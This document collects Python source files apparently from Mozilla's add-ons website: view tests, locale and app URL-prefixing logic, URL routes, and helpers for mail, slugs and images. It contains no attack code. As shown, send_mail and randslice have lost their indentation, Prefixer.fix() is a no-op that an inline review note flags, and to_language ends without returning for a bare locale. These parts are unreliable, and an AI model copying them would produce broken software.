            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
            ('Editor Tools', reverse('editors.home')),
            ('Admin Tools', reverse('zadmin.home')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
    def test_tools_developer_and_admin(self):
        # Make them a developer.
        user = self.login('admin', get=True)
        AddonUser.objects.create(user=user, addon=Addon.objects.all()[0])
        r = self.client.get(self.url, follow=True)
        request = r.context['request']
        eq_(request.amo_user.is_developer, True)
        eq_(acl.action_allowed(request, 'Addons', 'Review'), True)
        eq_(acl.action_allowed(request, 'Localizer', '%'), True)
        eq_(acl.action_allowed(request, 'Admin', '%'), True)
        expected = [
            ('Tools', '#'),
            ('Manage My Submissions', reverse('devhub.addons')),
            ('Submit a New Add-on', reverse('devhub.submit.1')),
            ('Developer Hub', reverse('devhub.index')),
            ('Editor Tools', reverse('editors.home')),
            ('Admin Tools', reverse('zadmin.home')),
        ]
        check_links(expected, pq(r.content)('#aux-nav .tools a'))
class TestOtherStuff(amo.tests.TestCase):
    # Tests that don't need fixtures but do need redis mocked.
    @mock.patch.object(settings, 'READ_ONLY', False)
    def test_balloons_no_readonly(self):
        response = self.client.get('/en-US/firefox/')
        doc = pq(response.content)
        eq_(doc('#site-notice').length, 0)
        eq_(doc('#site-nonfx').length, 1)
        eq_(doc('#site-welcome').length, 1)
    @mock.patch.object(settings, 'READ_ONLY', True)
    def test_balloons_readonly(self):
        # Read-only mode adds the site-notice balloon.
        response = self.client.get('/en-US/firefox/')
        doc = pq(response.content)
        eq_(doc('#site-notice').length, 1)
        eq_(doc('#site-nonfx').length, 1)
        eq_(doc('#site-welcome').length, 1)
    @mock.patch.object(settings, 'READ_ONLY', False)
    def test_thunderbird_balloons_no_readonly(self):
        response = self.client.get('/en-US/thunderbird/')
        eq_(response.status_code, 200)
        doc = pq(response.content)
        eq_(doc('#site-notice').length, 0)
    @mock.patch.object(settings, 'READ_ONLY', True)
    def test_thunderbird_balloons_readonly(self):
        response = self.client.get('/en-US/thunderbird/')
        doc = pq(response.content)
        eq_(doc('#site-notice').length, 1)
        eq_(doc('#site-nonfx').length, 0,
            'This balloon should appear for Firefox only')
        eq_(doc('#site-welcome').length, 1)
    def test_heading(self):
        # Each app gets its own site-title logo alt text and heading.
        def title_eq(url, alt, text):
            response = self.client.get(url, follow=True)
            doc = PyQuery(response.content)
            eq_(alt, doc('.site-title img').attr('alt'))
            eq_(text, doc('.site-title').text())
        title_eq('/firefox/', 'Firefox', 'Add-ons')
        title_eq('/thunderbird/', 'Thunderbird', 'Add-ons')
        title_eq('/mobile/extensions/', 'Mobile', 'Mobile Add-ons')
        title_eq('/android/', 'Firefox for Android', 'Android Add-ons')
    def test_login_link(self):
        # The anonymous login link points back at the current page.
        r = self.client.get(reverse('home'), follow=True)
        doc = PyQuery(r.content)
        next = urllib.urlencode({'to': '/en-US/firefox/'})
        eq_('/en-US/firefox/users/login?%s' % next,
            doc('.account.anonymous a')[1].attrib['href'])
    def test_tools_loggedout(self):
        r = self.client.get(reverse('home'), follow=True)
        eq_(pq(r.content)('#aux-nav .tools').length, 0)
    def test_language_selector(self):
        doc = pq(test.Client().get('/en-US/firefox/').content)
        eq_(doc('form.languages option[selected]').attr('value'), 'en-us')
    def test_language_selector_variables(self):
        # Existing query params are carried along as hidden inputs.
        r = self.client.get('/en-US/firefox/?foo=fooval&bar=barval')
        doc = pq(r.content)('form.languages')
        eq_(doc('input[type=hidden][name=foo]').attr('value'), 'fooval')
        eq_(doc('input[type=hidden][name=bar]').attr('value'), 'barval')
    @patch.object(settings, 'KNOWN_PROXIES', ['127.0.0.1'])
    def test_remote_addr(self):
        """Make sure we're setting REMOTE_ADDR from X_FORWARDED_FOR."""
        client = test.Client()
        # Send X-Forwarded-For as it shows up in a wsgi request.
        client.get('/en-US/firefox/', follow=True,
                   HTTP_X_FORWARDED_FOR='1.1.1.1')
        eq_(commonware.log.get_remote_addr(), '1.1.1.1')
    def test_jsi18n_caching(self):
        # The jsi18n catalog should be cached for a long time.
        # Get the url from a real page so it includes the build id.
        client = test.Client()
        doc = pq(client.get('/', follow=True).content)
        js_url = absolutify(reverse('jsi18n'))
        url_with_build = doc('script[src^="%s"]' % js_url).attr('src')
        response = client.get(url_with_build, follow=True)
        fmt = '%a, %d %b %Y %H:%M:%S GMT'
        expires = datetime.strptime(response['Expires'], fmt)
        assert (expires - datetime.now()).days >= 365
    def test_mobile_link_firefox(self):
        doc = pq(test.Client().get('/firefox', follow=True).content)
        eq_(doc('#site-nav #more .more-mobile a').length, 1)
    def test_mobile_link_nonfirefox(self):
        for app in ('thunderbird', 'mobile'):
            doc = pq(test.Client().get('/' + app, follow=True).content)
            eq_(doc('#site-nav #more .more-mobile').length, 0)
    # Renamed from test_login_link: a second method with the same name
    # shadowed the first definition above, so the first never ran.
    def test_login_link_encoding(self):
        # Test that the login link encodes parameters correctly.
        r = test.Client().get('/?your=mom', follow=True)
        doc = pq(r.content)
        assert doc('.account.anonymous a')[1].attrib['href'].endswith(
            '?to=%2Fen-US%2Ffirefox%2F%3Fyour%3Dmom'), ("Got %s" %
            doc('.account.anonymous a')[1].attrib['href'])
        r = test.Client().get(u'/ar/firefox/?q=འ')
        doc = pq(r.content)
        link = doc('.account.anonymous a')[1].attrib['href']
        assert link.endswith('?to=%2Far%2Ffirefox%2F%3Fq%3D%25E0%25BD%25A0')
@mock.patch('amo.views.log_cef')
class TestCSP(amo.tests.TestCase):
    """POSTed CSP violation reports are accepted and logged via log_cef."""
    def setUp(self):
        self.url = reverse('amo.csp.report')
        # NOTE(review): presumably a waffle sample gating report storage --
        # confirm against amo.views.cspreport.
        self.create_sample(name='csp-store-reports')
    def test_get_document(self, log_cef):
        # Only POST is allowed on the report endpoint.
        eq_(self.client.get(self.url).status_code, 405)
    def test_malformed(self, log_cef):
        # Non-JSON bodies are rejected with 400.
        res = self.client.post(self.url, 'f', content_type='application/json')
        eq_(res.status_code, 400)
    def test_document_uri(self, log_cef):
        # The report's document-uri ends up as PATH_INFO in the CEF call.
        url = 'http://foo.com'
        self.client.post(self.url,
                         json.dumps({'csp-report': {'document-uri': url}}),
                         content_type='application/json')
        eq_(log_cef.call_args[0][2]['PATH_INFO'], url)
    def test_no_document_uri(self, log_cef):
        # Without a document-uri, the endpoint's own path is logged.
        self.client.post(self.url, json.dumps({'csp-report': {}}),
                         content_type='application/json')
        eq_(log_cef.call_args[0][2]['PATH_INFO'], '/services/csp/report')
########NEW FILE########
__FILENAME__ = urlresolvers
#-*- coding: utf-8 -*-
import hashlib
import hmac
import urllib
from threading import local
from urlparse import urlparse, urlsplit, urlunsplit
import bleach
import jinja2
from django.conf import settings
from django.core import urlresolvers
from django.utils import encoding
from django.utils.translation.trans_real import parse_accept_lang_header
import amo
# Get a pointer to Django's reverse because we're going to hijack it after we
# define our own.
django_reverse = urlresolvers.reverse
# Thread-local storage for URL prefixes. Access with {get,set}_url_prefix.
_local = local()
def set_url_prefix(prefix):
    """Remember ``prefix`` as the URL prefixer for the current thread."""
    setattr(_local, 'prefix', prefix)
def get_url_prefix():
    """Return the prefixer stored for the current thread (None if unset)."""
    return _local.prefix if hasattr(_local, 'prefix') else None
def clean_url_prefixes():
    """Drop the current thread's cached URL prefixer, if any."""
    try:
        del _local.prefix
    except AttributeError:
        # Nothing was cached for this thread; nothing to purge.
        pass
def get_app_redirect(app):
    """Redirect request to another app.

    Rebuilds the current request path under ``app`` by temporarily swapping
    the thread-local prefixer's app.

    :param app: an amo application object (its ``short`` slug is used).
    :return: the current full path, re-prefixed for ``app``.
    """
    prefixer = get_url_prefix()
    old_app = prefixer.app
    prefixer.app = app.short
    try:
        (_, _, url) = prefixer.split_path(prefixer.request.get_full_path())
        new_url = prefixer.fix(url)
    finally:
        # The prefixer is shared thread-local state: always restore the
        # original app, even if split_path/fix raise.
        prefixer.app = old_app
    return new_url
def reverse(viewname, urlconf=None, args=None, kwargs=None, prefix=None,
            current_app=None, add_prefix=True):
    """Wraps django's reverse to prepend the correct locale and app.

    Note: any caller-supplied ``prefix`` is deliberately discarded below --
    the script prefix is re-applied by ``prefixer.fix()`` instead. The
    parameter only exists to mirror Django's signature.
    ``add_prefix=False`` skips the locale/app prefixing entirely.
    """
    prefixer = get_url_prefix()
    prefix = None
    # Blank out the script prefix since we add that in prefixer.fix().
    if prefixer:
        prefix = prefix or '/'
    url = django_reverse(viewname, urlconf, args, kwargs, prefix, current_app)
    if prefixer and add_prefix:
        return prefixer.fix(url)
    else:
        return url
# Replace Django's reverse with our own.
urlresolvers.reverse = reverse
class Prefixer(object):
    """Parses the locale and app prefixes off a request path and can
    re-apply them to other paths."""
    def __init__(self, request):
        self.request = request
        split = self.split_path(request.path_info)
        self.locale, self.app, self.shortened_path = split
    def split_path(self, path_):
        """
        Split the requested path into (locale, app, remainder).

        locale and app will be empty strings if they're not found.
        """
        path = path_.lstrip('/')
        # Use partition instead of split since it always returns 3 parts.
        first, _, first_rest = path.partition('/')
        second, _, rest = first_rest.partition('/')
        first_lower = first.lower()
        lang, dash, territory = first_lower.partition('-')
        # Check language-territory first.
        if first_lower in settings.LANGUAGES:
            if second in amo.APPS:
                return first, second, rest
            else:
                return first, '', first_rest
        # And check just language next.
        elif dash and lang in settings.LANGUAGES:
            # Consolidate e.g. 'es-PE' down to the supported bare 'es'.
            first = lang
            if second in amo.APPS:
                return first, second, rest
            else:
                return first, '', first_rest
        elif first in amo.APPS:
            # No locale, but the first segment names an app.
            return '', first, first_rest
        else:
            # First segment is neither a locale nor an app.
            if second in amo.APPS:
                return '', second, rest
            else:
                return '', '', path
    def get_app(self):
        """
        Return a valid application string using the User Agent to guess. Falls
        back to settings.DEFAULT_APP.
        """
        ua = self.request.META.get('HTTP_USER_AGENT')
        if ua:
            for app in amo.APP_DETECT:
                if app.matches_user_agent(ua):
                    return app.short
        return settings.DEFAULT_APP
    def get_language(self):
        """
        Return a locale code that we support on the site using the
        user's Accept Language header to determine which is best. This
        mostly follows the RFCs but read bug 439568 for details.
        """
        # An explicit lang= parameter (GET or POST) wins over the header.
        data = (self.request.GET or self.request.POST)
        if 'lang' in data:
            lang = data['lang'].lower()
            if lang in settings.LANGUAGE_URL_MAP:
                return settings.LANGUAGE_URL_MAP[lang]
            # Fall back to the bare language ('es-pe' -> 'es').
            prefix = lang.split('-')[0]
            if prefix in settings.LANGUAGE_URL_MAP:
                return settings.LANGUAGE_URL_MAP[prefix]
        accept = self.request.META.get('HTTP_ACCEPT_LANGUAGE', '')
        return lang_from_accept_header(accept)
    def fix(self, path):
        # Marketplace URLs are not prefixed with `/<locale>/<app>`.
        # NOTE(review): this no-op differs from the locale/app prepending the
        # url-prefix tests elsewhere expect; it looks like the Marketplace
        # variant of fix() -- confirm before reuse.
        return path
def get_outgoing_url(url):
    """
    Bounce a URL off an outgoing URL redirector, such as outgoing.mozilla.org.

    Returns ``url`` untouched when no redirector is configured, when the URL
    already points at the redirector (avoids double-escaping), or when its
    domain is whitelisted. Otherwise returns
    ``<REDIRECT_URL>/<hmac-sha256 hexdigest>/<quoted url>``.
    """
    if not settings.REDIRECT_URL:
        return url
    url_netloc = urlparse(url).netloc
    # No double-escaping, and some domain names are excluded.
    if (url_netloc == urlparse(settings.REDIRECT_URL).netloc
        or url_netloc in settings.REDIRECT_URL_WHITELIST):
        return url
    # Unescape HTML entities and coerce to a bytestring before signing.
    url = encoding.smart_str(jinja2.utils.Markup(url).unescape())
    sig = hmac.new(settings.REDIRECT_SECRET_KEY,
                   msg=url, digestmod=hashlib.sha256).hexdigest()
    # Let '&=' through so query params aren't escaped.  We probably shouldn't
    # bother to quote the query part at all.
    return '/'.join([settings.REDIRECT_URL.rstrip('/'), sig,
                     urllib.quote(url, safe='/&=')])
def linkify_bounce_url_callback(attrs, new=False):
    """bleach.linkify callback: route each link's href through the
    outgoing-URL redirector."""
    bounced = get_outgoing_url(attrs['href'])
    attrs['href'] = bounced
    return attrs
def linkify_with_outgoing(text, nofollow=True):
    """Linkify ``text`` with bleach, bouncing every URL through
    get_outgoing_url; optionally adds rel=nofollow."""
    if nofollow:
        callbacks = [linkify_bounce_url_callback, bleach.callbacks.nofollow]
    else:
        callbacks = [linkify_bounce_url_callback]
    return bleach.linkify(unicode(text), callbacks=callbacks)
def url_fix(s, charset='utf-8'):
    """Percent-encode the unsafe characters in a user-entered URL.

    Mimics what browsers do with characters like ' ' and parens so a
    human-typed URL becomes syntactically valid, e.g.
    u'http://de.wikipedia.org/wiki/Elf (Begriffsklärung)' becomes
    'http://de.wikipedia.org/wiki/Elf%20%28Begriffskl%C3%A4rung%29'.

    :param charset: target encoding when ``s`` is a unicode string.

    Lifted from Werkzeug.
    """
    if isinstance(s, unicode):
        s = s.encode(charset, 'ignore')
    pieces = urlsplit(s)
    # Quote path and query separately; each keeps its own safe characters.
    safe_path = urllib.quote(pieces[2], '/%:')
    safe_qs = urllib.quote_plus(pieces[3], ':&=')
    return urlunsplit((pieces[0], pieces[1], safe_path, safe_qs, pieces[4]))
def lang_from_accept_header(header):
    """Pick the best supported locale for an Accept-Language header.

    For each language the client lists (in q-value order), try in turn:
    an exact match, a bare-language prefix match (es-PE -> es), then an
    upgrade through settings.SHORTER_LANGUAGES (zh -> zh-CN).  Falls back
    to settings.LANGUAGE_CODE when nothing matches.
    """
    # Map all our lang codes and any prefixes to the locale code.
    langs = dict((k.lower(), v) for k, v in settings.LANGUAGE_URL_MAP.items())
    # If we have a lang or a prefix of the lang, return the locale code.
    for lang, _ in parse_accept_lang_header(header.lower()):
        if lang in langs:
            return langs[lang]
        prefix = lang.split('-')[0]
        # Downgrade a longer prefix to a shorter one if needed (es-PE > es)
        if prefix in langs:
            return langs[prefix]
        # Upgrade to a longer one, if present (zh > zh-CN)
        lookup = settings.SHORTER_LANGUAGES.get(prefix, '').lower()
        if lookup and lookup in langs:
            return langs[lookup]
    return settings.LANGUAGE_CODE
def remora_url(url, lang=None, app=None, prefix=''):
    """Build a remora-style URL, independent of Zamboni's prefixer logic.

    ``lang`` and ``app`` default to the current thread's prefixer values
    when None; pass '' for either to omit it from the URL entirely.
    """
    prefixer = get_url_prefix()
    if lang is None:
        lang = getattr(prefixer, 'locale', settings.LANGUAGE_CODE)
    if app is None:
        app = getattr(prefixer, 'app', settings.DEFAULT_APP)
    # Assemble the non-empty pieces, then sanitize the joined result.
    pieces = []
    for piece in (prefix.strip('/'), lang, app, url.lstrip('/')):
        if piece:
            pieces.append(piece)
    return url_fix('/' + '/'.join(pieces))
########NEW FILE########
__FILENAME__ = urls
import csp.views
from waffle.views import wafflejs
from django.conf.urls import include, patterns, url
from django.views.decorators.cache import never_cache
from . import views
services_patterns = patterns('',
url('^monitor(.json)?$', never_cache(views.monitor),
name='amo.monitor'),
url('^loaded$', never_cache(views.loaded), name='amo.loaded'),
url('^csp/policy$', csp.views.policy, name='amo.csp.policy'),
url('^csp/report$', views.cspreport, name='amo.csp.report'),
url('^timing/record$', views.record, name='amo.timing.record'),
)
urlpatterns = patterns('',
url('^robots.txt$', views.robots, name='robots.txt'),
url(r'^wafflejs$', wafflejs, name='wafflejs'),
('^services/', include(services_patterns)),
)
########NEW FILE########
__FILENAME__ = utils
import codecs
import collections
import contextlib
import datetime
import errno
import functools
import itertools
import operator
import os
import random
import re
import shutil
import time
import unicodedata
import urllib
import urlparse
import django.core.mail
from django import http
from django.conf import settings
from django.contrib import messages
from django.core import paginator
from django.core.cache import cache
from django.core.files.storage import default_storage as storage
from django.core.files.storage import FileSystemStorage
from django.core.serializers import json
from django.core.validators import validate_slug, ValidationError
from django.forms.fields import Field
from django.http import HttpRequest
from django.utils import translation
from django.utils.encoding import smart_str, smart_unicode
from django.utils.functional import Promise
from django.utils.http import urlquote
import bleach
import chardet
import elasticutils.contrib.django as elasticutils
import html5lib
import jinja2
import pytz
from babel import Locale
from cef import log_cef as _log_cef
from django_statsd.clients import statsd
from easy_thumbnails import processors
from html5lib.serializer.htmlserializer import HTMLSerializer
from jingo import env
from PIL import Image, ImageFile, PngImagePlugin
from amo import ADDON_ICON_SIZES
from amo.urlresolvers import linkify_with_outgoing, reverse
from translations.models import Translation
from users.models import UserNotification
from . import logger_log as log
heka = settings.HEKA
days_ago = lambda n: datetime.datetime.now() - datetime.timedelta(days=n)
def urlparams(url_, hash=None, **query):
    """
    Add a fragment and/or query paramaters to a URL.

    New query params will be appended to exising parameters, except duplicate
    names, which will be replaced.
    """
    parsed = urlparse.urlparse(url_)
    fragment = parsed.fragment if hash is None else hash
    # dict(parse_qsl(...)) collapses repeated keys to single values.
    params = {}
    if parsed.query:
        params = dict(urlparse.parse_qsl(smart_str(parsed.query)))
    for key, value in query.items():
        params[key] = value
    query_string = urlencode([(key, value) for key, value in params.items()
                              if value is not None])
    result = urlparse.ParseResult(parsed.scheme, parsed.netloc, parsed.path,
                                  parsed.params, query_string, fragment)
    return result.geturl()
def isotime(t):
    """Date/Time format according to ISO 8601."""
    if not hasattr(t, 'tzinfo'):
        return None
    utc = _append_tz(t).astimezone(pytz.utc)
    return utc.strftime("%Y-%m-%dT%H:%M:%SZ")
def epoch(t):
    """Date/Time converted to seconds since epoch"""
    if not hasattr(t, 'tzinfo'):
        return None
    localized = _append_tz(t)
    return int(time.mktime(localized.timetuple()))
def _append_tz(t):
    # Localize the naive datetime ``t`` to the site's configured time zone.
    tz = pytz.timezone(settings.TIME_ZONE)
    return tz.localize(t)
def sorted_groupby(seq, key):
    """
    Given a sequence, we sort it and group it by a key.

    key should be a string (used with attrgetter) or a function.
    """
    if not callable(key):
        key = operator.attrgetter(key)
    ordered = sorted(seq, key=key)
    return itertools.groupby(ordered, key=key)
def paginate(request, queryset, per_page=20, count=None):
    """
    Get a Paginator, abstracting some common paging actions.

    If you pass ``count``, that value will be used instead of calling
    ``.count()`` on the queryset.  This can be good if the queryset would
    produce an expensive count query.
    """
    paginator_class = (ESPaginator if isinstance(queryset, elasticutils.S)
                       else paginator.Paginator)
    p = paginator_class(queryset, per_page)

    if count is not None:
        p._count = count

    # Pull the page number from the request; non-integers mean page one.
    try:
        number = int(request.GET.get('page', 1))
    except ValueError:
        number = 1

    # Out-of-range pages fall back to the first page.
    try:
        paginated = p.page(number)
    except (paginator.EmptyPage, paginator.InvalidPage):
        paginated = p.page(1)

    paginated.url = u'%s?%s' % (request.path, request.GET.urlencode())
    return paginated
def send_mail(subject, message, from_email=None, recipient_list=None,
fail_silently=False, use_blacklist=True, perm_setting=None,
manage_url=None, headers=None, cc=None, real_email=False,
html_message=None, attachments=None, async=False,
max_retries=None):
"""
A wrapper around django.core.mail.EmailMessage.
Adds blacklist checking and error logging.
"""
from amo.tasks import send_email
import users.notifications as notifications
if not recipient_list:
return True
if isinstance(recipient_list, basestring):
raise ValueError('recipient_list should be a list, not a string.')
# Check against user notification settings
if perm_setting:
if isinstance(perm_setting, str):
perm_setting = notifications.NOTIFICATIONS_BY_SHORT[perm_setting]
perms = dict(UserNotification.objects
.filter(user__email__in=recipient_list,
notification_id=perm_setting.id)
.values_list('user__email', 'enabled'))
d = perm_setting.default_checked
recipient_list = [e for e in recipient_list
if e and perms.setdefault(e, d)]
# Prune blacklisted emails.
if use_blacklist:
white_list = []
for email in recipient_list:
if email and email.lower() in settings.EMAIL_BLACKLIST:
log.debug('Blacklisted email removed from list: %s' % email)
else:
white_list.append(email)
else:
white_list = recipient_list
if not from_email:
from_email = settings.DEFAULT_FROM_EMAIL
if cc:
# If not basestring, assume it is already a list.
if isinstance(cc, basestring):
cc = [cc]
if not headers:
headers = {}
def send(recipient, message, **options):
kwargs = {
'async': async,
'attachments': attachments,
'cc': cc,
'fail_silently': fail_silently,
'from_email': from_email,
'headers': headers,
'html_message': html_message,
'max_retries': max_retries,
'real_email': real_email,
}
kwargs.update(options)
# Email subject *must not* contain newlines
args = (recipient, ' '.join(subject.splitlines()), message)
if async:
return send_email.delay(*args, **kwargs)
else:
return send_email(*args, **kwargs)
if white_list:
result = send(recipient_list, message=message,
html_message=html_message, attachments=attachments)
else:
result = True
return result
def send_mail_jinja(subject, template, context, *args, **kwargs):
    """Sends mail using a Jinja template with autoescaping turned off.

    Jinja is especially useful for sending email since it has whitespace
    control.
    """
    # Autoescaping is toggled on the *shared* jinja environment, so restore
    # it in a finally block — otherwise an exception while rendering or
    # sending leaves autoescaping disabled for every later template render.
    autoescape_orig = env.autoescape
    env.autoescape = False
    try:
        template = env.get_template(template)
        msg = send_mail(subject, template.render(context), *args, **kwargs)
    finally:
        env.autoescape = autoescape_orig
    return msg
def send_html_mail_jinja(subject, html_template, text_template, context,
                         *args, **kwargs):
    """Sends HTML mail using a Jinja template with autoescaping turned off."""
    # Restore the shared environment's autoescape flag even on error; a
    # raised exception previously left autoescaping off globally.
    autoescape_orig = env.autoescape
    env.autoescape = False
    try:
        html_template = env.get_template(html_template)
        text_template = env.get_template(text_template)
        msg = send_mail(subject, text_template.render(context),
                        html_message=html_template.render(context), *args,
                        **kwargs)
    finally:
        env.autoescape = autoescape_orig
    return msg
class JSONEncoder(json.DjangoJSONEncoder):
    """Django JSON encoder extended with app-specific serializations."""

    def default(self, obj):
        # Imported here to avoid a circular import at module load time.
        from versions.models import ApplicationsVersions

        # Translations and lazy i18n Promises serialize to their unicode text.
        unicodable = (Translation, Promise)

        if isinstance(obj, unicodable):
            return unicode(obj)
        if isinstance(obj, ApplicationsVersions):
            # Shape: {app name: {'min': min version, 'max': max version}}.
            return {unicode(obj.application): {'min': unicode(obj.min),
                                               'max': unicode(obj.max)}}

        return super(JSONEncoder, self).default(obj)
def chunked(seq, n):
    """
    Yield successive n-sized chunks from seq.

    Example: chunked(range(8), 3) yields [0, 1, 2], [3, 4, 5], [6, 7].
    """
    iterator = iter(seq)
    while True:
        chunk = list(itertools.islice(iterator, n))
        if not chunk:
            return
        yield chunk
def urlencode(items):
    """A Unicode-safe URLencoder."""
    # NOTE(review): ``items`` is iterated twice on the fallback path, so a
    # one-shot iterator would encode as empty — callers appear to pass lists.
    try:
        return urllib.urlencode(items)
    except UnicodeEncodeError:
        # Coerce values to encoded byte strings and retry.
        return urllib.urlencode([(k, smart_str(v)) for k, v in items])
def randslice(qs, limit, exclude=None):
"""
Get a random slice of items from ``qs`` of size ``limit``.
There will be two queries. One to find out how many elements are in ``qs``
and another to get a slice. The count is so we don't go out of bounds.
If exclude is given, we make sure that pk doesn't show up in the slice.
This replaces qs.order_by('?')[:limit].
"""
cnt = qs.count()
# Get one extra in case we find the element that should be excluded.
if exclude is not None:
limit += 1
rand = 0 if limit > cnt else random.randint(0, cnt - limit)
slice_ = list(qs[rand:rand + limit])
if exclude is not None:
slice_ = [o for o in slice_ if o.pk != exclude][:limit - 1]
return slice_
# Extra characters outside of alphanumerics that we'll allow.
SLUG_OK = '-_~'


def slugify(s, ok=SLUG_OK, lower=True, spaces=False, delimiter='-'):
    """Slugify ``s``: keep unicode letters/numbers plus chars in ``ok``."""
    # L and N signify letter/number.
    # http://www.unicode.org/reports/tr44/tr44-4.html#GC_Values_Table
    kept = []
    for char in smart_unicode(s):
        category = unicodedata.category(char)[0]
        if category in 'LN' or char in ok:
            kept.append(char)
        if category == 'Z':  # space
            kept.append(' ')
    new = ''.join(kept).strip()
    if not spaces:
        new = re.sub('[-\s]+', delimiter, new)
    return new.lower() if lower else new
def slug_validator(s, ok=SLUG_OK, lower=True, spaces=False, delimiter='-',
                   message=validate_slug.message, code=validate_slug.code):
    """
    Raise an error if the string has any punctuation characters.

    Regexes don't work here because they won't check alnums in the right
    locale.
    """
    # Empty strings and strings that change under slugification are invalid.
    if not s:
        raise ValidationError(message, code=code)
    if slugify(s, ok, lower, spaces, delimiter) != s:
        raise ValidationError(message, code=code)
def raise_required():
    # Shortcut for raising Django's standard "this field is required" error.
    raise ValidationError(Field.default_error_messages['required'])
def clear_messages(request):
    """
    Clear any messages out of the messages framework for the authenticated
    user.
    Docs: http://bit.ly/dEhegk
    """
    # Iterating the message storage marks messages as read, which causes the
    # framework to discard them at the end of the request.
    for message in messages.get_messages(request):
        pass
def clean_nl(string):
    """
    This will clean up newlines so that nl2br can properly be called on the
    cleaned text.
    """
    # Block-level tags (etree-namespaced) around which stray newlines would
    # otherwise become spurious <br>s.
    html_blocks = ['{http://www.w3.org/1999/xhtml}blockquote',
                   '{http://www.w3.org/1999/xhtml}ol',
                   '{http://www.w3.org/1999/xhtml}li',
                   '{http://www.w3.org/1999/xhtml}ul']

    if not string:
        return string

    def parse_html(tree):
        # In etree, a tag may have:
        # - some text content (piece of text before its first child)
        # - a tail (piece of text just after the tag, and before a sibling)
        # - children
        # Eg: "<div>text <b>children's text</b> children's tail</div> tail".

        # Strip new lines directly inside block level elements: first new lines
        # from the text, and:
        # - last new lines from the tail of the last child if there's children
        #   (done in the children loop below).
        # - or last new lines from the text itself.
        if tree.tag in html_blocks:
            if tree.text:
                tree.text = tree.text.lstrip('\n')
                if not len(tree):  # No children.
                    tree.text = tree.text.rstrip('\n')

            # Remove the first new line after a block level element.
            if tree.tail and tree.tail.startswith('\n'):
                tree.tail = tree.tail[1:]

        for child in tree:  # Recurse down the tree.
            if tree.tag in html_blocks:
                # Strip new lines directly inside block level elements: remove
                # the last new lines from the children's tails.
                if child.tail:
                    child.tail = child.tail.rstrip('\n')

            parse_html(child)
        return tree

    parse = parse_html(html5lib.parseFragment(string))

    # Serialize the parsed tree back to html.
    walker = html5lib.treewalkers.getTreeWalker('etree')
    stream = walker(parse)
    serializer = HTMLSerializer(quote_attr_values=True,
                                omit_optional_tags=False)
    return serializer.render(stream)
# From: http://bit.ly/eTqloE
# Without this, you'll notice a slight grey line on the edges of
# the adblock plus icon.
def patched_chunk_tRNS(self, pos, len):
    """Replacement PNG tRNS chunk reader that records transparency info."""
    i16 = PngImagePlugin.i16
    s = ImageFile._safe_read(self.fp, len)
    if self.im_mode == "P":
        # Palette mode: one alpha byte per palette entry.
        self.im_info["transparency"] = map(ord, s)
    elif self.im_mode == "L":
        # Greyscale: a single 16-bit transparent level.
        self.im_info["transparency"] = i16(s)
    elif self.im_mode == "RGB":
        # Truecolour: one 16-bit value per channel.
        self.im_info["transparency"] = i16(s), i16(s[2:]), i16(s[4:])
    return s
# Monkey-patch PIL's PNG stream reader with the fixed implementation.
PngImagePlugin.PngStream.chunk_tRNS = patched_chunk_tRNS
def patched_load(self):
    """Replacement Image.load that applies palette transparency (RGBA)."""
    if self.im and self.palette and self.palette.dirty:
        # Push the (possibly updated) palette into the core image object.
        apply(self.im.putpalette, self.palette.getdata())
        self.palette.dirty = 0
        self.palette.rawmode = None
        try:
            trans = self.info["transparency"]
        except KeyError:
            # No transparency chunk recorded: plain RGB palette.
            self.palette.mode = "RGB"
        else:
            try:
                # Sequence of per-entry alpha values.
                for i, a in enumerate(trans):
                    self.im.putpalettealpha(i, a)
            except TypeError:
                # Single transparent palette index: make it fully transparent.
                self.im.putpalettealpha(trans, 0)
            self.palette.mode = "RGBA"
    if self.im:
        return self.im.pixel_access(self.readonly)
# Monkey-patch PIL so palette transparency is honoured on load.
Image.Image.load = patched_load
def resize_image(src, dst, size=None, remove_src=True, locally=False):
    """Resizes and image from src, to dst. Returns width and height.

    When locally is True, src and dst are assumed to reside
    on the local disk (not in the default storage). When dealing
    with local files it's up to you to ensure that all directories
    exist leading up to the dst filename.
    """
    if src == dst:
        raise Exception("src and dst can't be the same: %s" % src)

    # Pick local-disk or default-storage backends for open/delete.
    open_file = open if locally else storage.open
    delete_file = os.unlink if locally else storage.delete

    with open_file(src, 'rb') as src_fp:
        image = Image.open(src_fp).convert('RGBA')
        if size:
            image = processors.scale_and_crop(image, size)
        with open_file(dst, 'wb') as dst_fp:
            image.save(dst_fp, 'png')

    if remove_src:
        delete_file(src)

    return image.size
def remove_icons(destination):
    """Delete every icon-size variant for ``destination`` from storage."""
    for size in ADDON_ICON_SIZES:
        path = '%s-%s.png' % (destination, size)
        if storage.exists(path):
            storage.delete(path)
class ImageCheck(object):
    """Validity and animation checks for an uploaded image file object."""

    def __init__(self, image):
        # ``image`` is a seekable file-like object.
        self._img = image

    def is_image(self):
        """Return True if the file parses and verifies as an image."""
        try:
            self._img.seek(0)
            self.img = Image.open(self._img)
            # PIL doesn't tell us what errors it will raise at this point,
            # just "suitable ones", so let's catch them all.
            self.img.verify()
            return True
        except Exception:
            # Was a bare ``except:`` — narrowed to Exception so we keep the
            # intentional best-effort behavior without also swallowing
            # SystemExit/KeyboardInterrupt.
            log.error('Error decoding image', exc_info=True)
            return False

    def is_animated(self, size=100000):
        """Return True for animated PNGs (APNG) and multi-frame GIFs."""
        if not self.is_image():
            return False

        img = self.img
        if img.format == 'PNG':
            self._img.seek(0)
            data = ''
            while True:
                chunk = self._img.read(size)
                if not chunk:
                    break
                data += chunk
            # An APNG carries an acTL chunk before the first IDAT chunk.
            acTL, IDAT = data.find('acTL'), data.find('IDAT')
            if acTL > -1 and acTL < IDAT:
                return True
            return False
        elif img.format == 'GIF':
            # See the PIL docs for how this works:
            # http://www.pythonware.com/library/pil/handbook/introduction.htm
            try:
                img.seek(1)
            except EOFError:
                return False
            return True
class MenuItem():
    """Refinement item with nestable children for use in menus."""
    # NOTE(review): these are class attributes, so ``children`` is a mutable
    # list shared by every instance that doesn't assign its own — presumably
    # callers always set these per-instance; confirm before mutating defaults.
    url, text, selected, children = ('', '', False, [])
def to_language(locale):
    """Like django's to_language, but en_US comes out as en-US."""
    # A locale looks like en_US or fr.
    if '_' in locale:
        # Normalize through Django first, then fix the region casing below.
        return to_language(translation.trans_real.to_language(locale))
    if '-' in locale:
        # Django returns en-us but we want to see en-US.
        lang, region = locale.split('-')
        return '%s-%s' % (lang, region.upper())
